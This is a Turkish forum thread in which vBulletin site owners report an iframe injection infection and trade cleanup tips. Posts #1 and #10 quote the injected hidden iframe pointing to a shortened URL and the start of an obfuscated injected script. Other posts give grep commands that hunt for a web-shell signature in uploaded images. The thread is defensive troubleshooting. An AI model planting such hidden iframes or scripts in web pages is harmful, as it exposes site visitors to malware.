Results 1 to 15 of 15

İframe Enjeksiyon Virüsü tinyurl . com/yf4sxxm

This is a discussion on İframe Enjeksiyon Virüsü tinyurl . com/yf4sxxm within the Türkçe forums, part of the General Discussion category; Merhabalar bu iframe virüslerinden artýk yoruldum. Sunucumda ki güvenlik ve optimizasyonu tekrar gözden geçirdim ayrýca download alanýndan güncel dosyalarýmý indirdim. ...

  1. #1
    ALP
    ALP is offline
    Senior Member ALP's Avatar
    Real Name
    Emre
    Join Date
    Mar 2009
    Posts
    182
    Liked
    1 times
    Blog Entries
    2

    Angry İframe Enjeksiyon Virüsü tinyurl . com/yf4sxxm

    Merhabalar bu iframe virüslerinden artık yoruldum. Sunucumda ki güvenlik ve optimizasyonu tekrar gözden geçirdim ayrıca download alanından güncel dosyalarımı indirdim. Fakat halen javascript dosyalarıma virüs ekleniyor. Ayrıca son 3 gündürde temalarımın headerina
    PHP Code:
    <iframe width=1·height=1·border=0·frameborder=0·src="http:// tinyurl . com/yf4sxxm"></iframe
    Bu kod ekleniyor. vBulletin.com'da aldığım cevap vBseodan doğan bir sorun olduğunu güncel sürümü yuklememı ayrıca yazılabılır olan dosyalarımın ıcınde zaco.php ve doit_js.php gibi php dosyalar varsa silmemi söylediler hepsini yaptım. Bu gerçekten zararlı olmaya başladı üyeler artık şikayetçi nerdeyse siteye girmemeye başladılar ve google web yöneticisindede uyarı almaya başladım kötü yazılım bulunduruluyor diye şuanda engelli değilim ama böyle giderse engelleneceğim.

    Şimdiden yardımlarınız için teşekkür ederim..

  2. #2
    vBSEO.com Webmaster Mert Gökçeimam's Avatar
    Real Name
    Lizard King
    Join Date
    Oct 2005
    Location
    Istanbul, Turkey, Turkey
    Posts
    22,367
    Liked
    542 times
    Blog Entries
    4
    Serverınızda bulunan tüm dosyaları araştırmalısınız. vBSEO içerisinde her hangi bir açık bulunmamaktadır. Serverınızda bulunan zararlı dosyalar varsa bunları temizlemeniz gerekmektedir.
    Mert Gökçeimam / Crawlability Inc.

    vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
    Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!


    Twitter:@Depkac
    Personal Blog : Mert Gökçeimam

  3. #3
    Junior Member
    Real Name
    emrah
    Join Date
    Apr 2008
    Posts
    28
    Liked
    0 times
    Vbseo sürümünü güncelleyin.
    signaturepic
    customeprofilepics klasörlerini kontrol edin. .php uzantılı dosyaları silin. işe yarıyor

  4. #4
    ALP
    ALP is offline
    Senior Member ALP's Avatar
    Real Name
    Emre
    Join Date
    Mar 2009
    Posts
    182
    Liked
    1 times
    Blog Entries
    2
    Emrah bey konu açıklamama bakarsanız onları yaptım.

    Serveri tekrardan araştırdım zaten 3 site kurulu serverde hepsini tek tek araştırdım çok zamanı aldı ama sanırım başarılı oldum şuanda virüs yok sitemde.

    Teşekkür Ederim.

  5. #5
    Junior Member
    Real Name
    emrah
    Join Date
    Apr 2008
    Posts
    28
    Liked
    0 times
    Kusura bakmayın iframe virüsünü görünce kendi uyguladıklarımı yazıyorum otomatik olarak 3 sitemden temizledim bu şekilde Ama vbseo güncellemeden sorun aşılamıyor maalesef. Bir ara patch yayınlanmıştı o patch bu sorunu çözüyor muhtemelen.
    Ek olarak bahsettiğim klasörler içinde sadece zaco.php vs değil hangi isimle olursa olsun .php dosya varsa mutlaka silin.

    Quote Originally Posted by ALP View Post
    Emrah bey konu açıklamama bakarsanız onları yaptım.

    Serveri tekrardan araştırdım zaten 3 site kurulu serverde hepsini tek tek araştırdım çok zamanı aldı ama sanırım başarılı oldum şuanda virüs yok sitemde.

    Teşekkür Ederim.

  6. #6
    vBSEO.com Webmaster Mert Gökçeimam's Avatar
    Real Name
    Lizard King
    Join Date
    Oct 2005
    Location
    Istanbul, Turkey, Turkey
    Posts
    22,367
    Liked
    542 times
    Blog Entries
    4
    ssh ile login olup aşağıdaki komutlar ile serverınızı aratın ve şüpheli tüm dosyaları temizleyin

    .htaccess dosyalarını bulur

    Code:
    find . -name .htaccess -exec grep -i httpd-php {} \;
    şüpheli gif dosyalarını bulur

    Code:
    find . -regex '.*\.gif$' -exec grep phpspypass {} \;
    Mert Gökçeimam / Crawlability Inc.

    vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
    Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!


    Twitter:@Depkac
    Personal Blog : Mert Gökçeimam

  7. #7
    Senior Member
    Join Date
    Jan 2006
    Posts
    114
    Liked
    0 times
    yukarda mert in dediğini
    kullanıcıların tüm gif yüklediği klasörlerde yapacaksın
    signaturepic
    customeprofilepics
    avatarlar falan filan hepsine bakcaksın
    sorun vbseo dan kaynaklanıyor yükselticeksin ve
    sitendeki açılmış arka kapıları da kaldıracaksın yukarda arkadaşların anlattığı gibi

    hatta
    find . -regex '.*\.gif$' -exec grep php {} \;
    komuduna da bak zararsız bile olsa bikaç ekstra gif silmenin sakıncası yok

  8. #8
    Senior Member
    Join Date
    Jan 2006
    Posts
    114
    Liked
    0 times
    ek olarak illa gif değil jpg de yükleniyorsa onlara falan da bak

  9. #9
    ALP
    ALP is offline
    Senior Member ALP's Avatar
    Real Name
    Emre
    Join Date
    Mar 2009
    Posts
    182
    Liked
    1 times
    Blog Entries
    2
    Teşekkür ederim Mert Bey ;

    Taramayı yaptım şuanda öyle bir sorun kalmadı.

  10. #10
    Member
    Real Name
    my2dd
    Join Date
    Dec 2009
    Posts
    33
    Liked
    0 times
    Ben Sabahtan beri Bu Virüs Olayıyla Uğraşıyorum Ftp Yi Tamamen Silim Herşeyi Yeniden Yükledim İndex lerin ve .js lerin en alt satırlarında

    <script>var O=new Array();var NK=new Date();var kZ='';var a='';function W(){this.uk="";var rL;if(rL!='P')

    Yukarıdaki Kodla Başlayan Kodlar Vardı Hepsini Ftp den Temilzedim Ama Hala Siteye Girdiğimde Virüs Uyarısı Alıyorum Bende Bu Kodu Veritabanında Arattım Ve Bir Sürü Tablo İçerisinde Buldu Şimdi Onları Temizleyeceğim Ama Bir Yandan da Temizlemeye Korkuyorum. Yedek te Aldım Neyse Şimdi Sormak İstediğim Soru Bu Virüs Mysql e Nası Bulaşır Genelede Log ve Cache Tablolarında Var.

    Yardımlarınızı Bekliyorum.

  11. #11
    vBSEO.com Webmaster Mert Gökçeimam's Avatar
    Real Name
    Lizard King
    Join Date
    Oct 2005
    Location
    Istanbul, Turkey, Turkey
    Posts
    22,367
    Liked
    542 times
    Blog Entries
    4
    Bu konuda bizim yapabileceğimiz birşey yok. Bütün talimatlar verilmiştir bunun gerisi size kalmış birşeydir.
    Mert Gökçeimam / Crawlability Inc.

    vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
    Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!


    Twitter:@Depkac
    Personal Blog : Mert Gökçeimam

  12. #12
    Member
    Real Name
    my2dd
    Join Date
    Dec 2009
    Posts
    33
    Liked
    0 times
    Oke Sorunumu Sonunda Çözdüm Sunucu Güvenliğide Yükseltildi İnşallah Bu Durum Tekrarlanmaz.

  13. #13
    Member
    Real Name
    ozkandonmez
    Join Date
    Oct 2006
    Location
    Turkey
    Posts
    56
    Liked
    0 times
    vbulletin_global.js dosyasına bulaştırılıyordu bende chmod 444 yaptım sorun çözüldü.
    Ayrıca mert beyin bahsettiği güvenlik işlemlerini mutlaka uygulayınız.

  14. #14
    ALP
    ALP is offline
    Senior Member ALP's Avatar
    Real Name
    Emre
    Join Date
    Mar 2009
    Posts
    182
    Liked
    1 times
    Blog Entries
    2
    Ozkan bey chmod 444 yapmanız javascripti çalıştırmanızı engelleyebilir

  15. #15
    Member
    Real Name
    ozkandonmez
    Join Date
    Oct 2006
    Location
    Turkey
    Posts
    56
    Liked
    0 times
    Sn.Alp , ben ezbere konuşmam da yazmam da , clientscript içindeki vbulletin_global.js dosyasına habire farklı kodlar yazdırılıyordu ,

    444 chmod her grup sadece okur , admin in bu dosya üzerinde oynayabilmesi için ya ssh panelle server dan direk çalışmalı yada erişim izinlerini owner a göre ayarlanmalıdır.

    chmod u 444 yapılan bir dosyayı da bilinen ftp programları ile silinemez.

    Ben bu şekilde tedbir altına aldım sonradan tüm sıkıntılar sona erdi.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •